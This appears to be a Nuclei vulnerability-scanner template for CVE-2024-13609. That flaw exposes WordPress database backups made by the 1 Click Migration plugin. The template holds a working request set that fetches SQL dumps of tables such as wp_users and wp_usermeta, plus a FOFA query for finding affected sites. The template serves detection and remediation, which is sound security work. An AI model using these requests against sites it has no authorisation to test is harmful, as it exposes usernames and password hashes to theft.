id: CVE-2024-13609 info: name: WordPress 1 Click Migration Plugin < 2.3 - Information Exposure author: pussycat0x severity: medium description: | The 1 Click WordPress Migration Plugin – 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 via the class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data including usernames and their respective password hashes during a short window of time in which the backup is in process. impact: Unauthenticated attackers can retrieve sensitive data including usernames and password hashes, risking account compromise. remediation: Update to the latest version of the plugin where the issue is fixed. reference: - https://wpscan.com/vulnerability/17fa121a-caa6-46ef-a865-eafd97d86abb/ - https://nvd.nist.gov/vuln/detail/CVE-2024-13609 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cwe-id: CWE-200 cve-id: CVE-2024-13609 epss-score: 0.01575 epss-percentile: 0.72231 metadata: verified: true max-request: 6 framework: wordpress vendor: 1-click-migration product: 1-click-migration fofa-query: body="/wp-content/plugins/1-click-migration/" tags: cve,cve2024,wp,wordpress,wp-plugin,1clickmigration,exposure,vkev http: - method: GET path: - "{{BaseURL}}/wp-content/tmp/db/{{table}}.sql" attack: batteringram payloads: table: - "wp_users" - "wp_usermeta" - "wp_options" - "wp_posts" - "wp_comments" - "wp_postmeta" matchers: - type: dsl dsl: - 'contains_all(body, "CREATE TABLE", "INSERT INTO", "DROP TABLE")' - 'contains(content_type, "application/sql")' - 'status_code == 200' condition: and # digest: 4a0a00473045022020f2989e25a0abf445a02c31946f9e92013074a520971f91aec82e4ad1c5eaaf022100b8c9b1037efcb29e4d411f10f5a2eb2cb9101074ea5c91eb02751d947f75b6af:922c64590222798bb761d5b6d8e72950